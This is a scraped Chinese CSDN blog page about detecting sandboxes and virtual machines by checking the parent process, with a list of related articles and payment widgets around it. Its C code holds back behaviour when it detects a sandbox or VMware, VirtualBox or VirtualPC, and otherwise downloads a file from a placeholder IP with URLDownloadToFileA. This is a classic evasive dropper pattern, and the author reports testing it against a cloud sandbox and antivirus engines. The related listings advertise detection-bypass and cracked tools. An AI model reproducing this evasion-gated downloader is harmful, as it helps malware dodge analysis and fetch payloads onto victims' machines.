基于父进程的沙箱和虚拟机检测方式

最新推荐文章于 2023-10-02 23:44:35 发布
最新推荐文章于 2023-10-02 23:44:35 发布
阅读量1.1k 收藏 2
点赞数
文章标签: 沙箱检测 虚拟机检测
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/claysystem/article/details/102685430
版权 
1.检查是否在沙箱中
2.检查是否在虚拟机中
int main()
{
	if (CheckSandBox()) 
	{
		printf("work\n");
		if (CheckVMWare() || CheckVirtualBox() || CheckVirtualPC())
		{
			printf("虚拟机\n");
		}
		else
		{
			URLDownloadToFileA(NULL, "http://xx.xx.xx.xx/1.gif", "1.jpg", 0, NULL);
		}
	}
	else {
		printf("no work\n");
	}
	
	system("pause");
}

首先将不加壳的exe上传到某云沙箱中,因为用了字符串比较函数比较父进程是否是Explorer,这就触发了沙箱中的一个行为检测

 这里很奇怪,检测的截图结果是这些

 没有打印出work或者no work 无法判断是否能检测成功沙箱
这里杀软是不杀的 但是在实际测试中360杀毒是会杀的

 

最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
QuickLaunch虚拟机沙箱完全破解
02-16
QuickLaunch沙箱实用安全,可隔离运行软件使电脑不受病毒侵害,已破解64位签名证书。具体教程 http://bbs.kafan.cn/thread-1837007-1-1.html
沙箱程序之虚拟机
weixin_33692284的博客
08-17 1206
2019独角兽企业重金招聘Python工程师标准>>> ...
《Java虚拟机》学习3-安全
03-24 87
学习了一下Java的安全机制,以前学习C++的时候好像就从来没有考虑过太多安全方面的问题,一些代码方面的安全问题,诸如指针、内存什么的考虑过,但是整体的安全性基本无视,学习了这一章还是有蛮多收获。 沙箱 组成沙箱的四个组件: 类装载器 class文件检验器 Java虚拟机内置的安全特性 安全管理器 类装载器 通过命名空间隔离类,使不同命名空间的...
有一种神奇的性格叫——INTJ
濯君
03-23 2万+
2.3.1 沙箱 要了解 INTJ 的性格,首先要明确一个叫做沙箱的概念。 INTJ,我们从这四个字母就能看出他的性格特点:内向的人本身就不喜欢与人交往,直觉让他们倾向于自己冥想,理性的思维使他们只关注事物的本身逻辑,判断的的特性让他们很少做出理解他人感受的举动。这四个功能都是那种较少和外界接触,相对独立的功能,合在一起自然使 INTJ成了十六种性格里最独立也最封闭的一种性格。 大多数人的功能是为了适应和认识外在的世界,INTJ 就完全走向另一个极端,纯粹的构建一个心中的完美的世界,也就是他...
沙箱虚拟机的区别
syy的博客
09-19 3072
Sandboxie又叫沙箱、沙盘、沙盒等,是一个虚拟系统程序,是在现有的系统下隔离一个环境,里面有沙箱拷贝的现有系统下的文件系统和注册表。沙箱相当于一个安全软件,可以用于测试不受信任的文件或应用程序等行为的工具。当让指定软件在里面运行,指定的软件可以访问磁盘上的现有文件,但这种访问是虚拟的访问了文件,并不会对真实机上的文件造成影响。虽然沙箱所有的操作都是在本地系统中进行的,但是沙箱会把所有操作记录下来,并在特定的时候将所有这些操作撤销到之前记录的某一时间点去。带有sandbox的计算机结构虚拟机的定义。
vmcloak:自动生成和隐藏杜鹃沙箱虚拟机
05-03
VMCloak 自动生成和隐藏杜鹃沙箱虚拟机。介绍VMCloak是用于完全创建和准备供Cuckoo Sandbox使用的虚拟机的工具。 为了创建一个新的虚拟机,应准备一些配置值,该值稍后将由该工具使用。依存关系VMCloak依赖于生成...
anti-sandbox:Windows对抗沙箱虚拟机的方法总结
03-09
Windows对抗沙箱虚拟机的方法总结 方法总结 功能 功能 备注 checkCPUCores 检查CPU核心数 检查CPU温度 检查CPU温度 需要管理员权限 checkDomain 检测域名 原理未知,测试不成功 检查MAC 检测MAC地址 checkMemory ...
pyrebox:Python脚本化的反向工程沙箱,基于QEMU的虚拟机检测和检查框架
02-25
PyREBox是Python脚本化的反向工程沙箱。 它基于QEMU,其目标是通过提供不同角度的动态分析和调试功能来帮助进行逆向工程。 通过在python中创建简单的脚本来自动执行任何类型的分析,PyREBox可以检查正在运行的QEMU ...
动态沙箱检测与反检测技术进展.pdf
08-08
•动态沙箱检测高级威胁的重要手段 二、环境敏感的恶意软件 •探测沙箱环境,对抗沙箱检测技术手段 三、环境敏感恶意软件的检测 •针对环境探测的各种检测思路及进展 四、我们的工作及进展 •金刚系统及相关进展
沙盒化容器:是容器还是虚拟机
hanfengzxh的博客
12-07 983
随着 IT 技术的发展,AI、区块链和大数据等技术提升了对应用毫秒级扩展的需求,开发人员也面临着的功能快速推出的压力。混合云是新常态,数字化转型是保持竞争力的必要条件,虚拟化成为这些挑战的基本技术。 在虚拟化的世界,有两个词耳熟能详:虚拟机和容器。前者是对硬件的虚拟化,后者则更像是操作系统的虚拟化。两者都提供了沙箱的能力:虚拟机通过硬件级抽象提供,而容器则使用公共内核提供进程级的隔离。有很多人将容器看成是“轻量化的虚拟机”,通常情况下我们认为容器是安全的,那到底是不是跟我们想象的一样? 容器:轻量化的虚拟机
虚拟机过VMP软件下载
10-18
完全去虚拟化 CPU 显卡 硬盘 主板 网卡 声卡 型号 内存 过检测 修改 过鲁大师 支持多种游戏运行 暴风游戏 :魔兽世界 等 原神 腾讯游戏: DNF CF 等等 私服游戏: 诺亚方舟2 神武 神泣 传奇 steam游戏等等
如何制作自己的沙箱:解释了简单的沙箱
04-06
沙盒底漆
影子系统、沙箱虚拟机之间的区别
Jian Sun_的博客
03-15 4576
简单一点来说,在影子系统里面对系统所作的一切操作,重启后系统会恢复成原样。之前所作的操作会丢失,书面的意思就是系统的影子,对影子的操作并不影响本机。 沙箱是给应用程序一个虚拟的环境,在系统中给沙箱独立出一片区域,在沙箱里面的一切操作不会影响沙盘外的系统,但沙箱里面的操作还是保留的。 虚拟机可以理解为你对一台真实的独立的机器进行操作,这台机器有自己的IP之类的东西,你所作的操作都是对该机器操作,所作的操作会保留,但对本机不影响。 具体来说,例如你安装了一个应用程序。这个程序会把一个系统设置从A修改.
VMware虚拟机检测详细教程,巨全面,小白专享教程
qq_54001206的博客
08-28 4万+
虚拟机检测,修改硬件,解除机器码,流畅稳定多开游戏
VMware绕过软件的虚拟机检测
热门推荐
nianbingsihan的博客
07-23 5万+
部分软件启动后会检测其是否运行在虚拟机中,如果是则退出. 下面给出绕过虚拟机检测的方法: 1.修改虚拟机vmx文件. 关闭虚拟机,前往虚拟机目录,找到.vmx后缀的文件,如WinXP.vmx,备份原文件后,使用Notepad++打开,在末尾添加一行: monitor_control.restrict_backdoor = "true" 重启虚拟机即可.   如果还不行,请参考: ...
虚拟机过se,vmp等基础检测
最新发布
qq_54001206的博客
10-02 2286
过se,vmp,tmd等基础虚拟机检测
vmware VM虚拟机去虚拟化教程 硬件虚拟机 过鲁大师检测
d3soft的专栏
04-16 2万+
文件,文件路径为:C:\Program Files (x86)\VMware\VMware Workstation\x64\vmware-vmx.exe。在修改之前请先备份一个vmware-vmx.exe 如果文件 改错到时可以恢复程序弄,另外虚拟机是要在关闭状态下修改。主板、系统制造商等bios信息是用Phoenix BIOS Editor来修改的,bios文件对应为BIOS.440.ROM 文末和工具一起打包下载。打开后,修改DMI Strings 信息页面,如下图就是修改好的bios。
2014简单绕过某60进程查杀
落笔飞花笑百生的博客
04-27 1745
 ;落笔飞花笑百生 ;2014.12.9 ;过360进程一个弱弱的方法 ;过360启动项 .386 .model flat,stdcall option casemap:none include windows.inc includelib kernel32.lib include kernel32.inc include user32.inc include
影子系统、沙盒、虚拟机的区别,沙盒化容器:是容器还是虚拟机,容器、虚拟机、虚拟环境的区别
qq_15821487的博客
10-06 1552
这层内核要保持容器的轻量级,使用现代编程技术编写,本身非常轻,仅用于作为容器和主机之间的强隔离层。虚拟机虚拟机里面,有这个程序,系统设置是B,虚拟机里面的所有程序看到的系统设置都是B。沙盒是给应用程序一个虚拟的环境,在沙盒里面的一切操作不会影响沙盒外的系统,但沙盒里面的操作还是保留的。简单来说,在影子系统里面对系统所作的一切操作,重启后系统会恢复成原样。沙盒:这个程序还在,在这个程序看来,系统设置是B,但是沙盒外的程序看到的系统设置还是A。虚拟机是操作系统级别的资源隔离,而容器本质上是进程级的资源隔离。
Android漏洞检测沙箱系统的设计与实现
Android 0day 漏洞检测沙箱系统的设计与实现是为了检测和防御 Android 系统中的 0day 漏洞,保护用户的安全。该系统的设计与实现需要考虑到各种漏洞的类型和防御机制,以确保 Android 系统的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值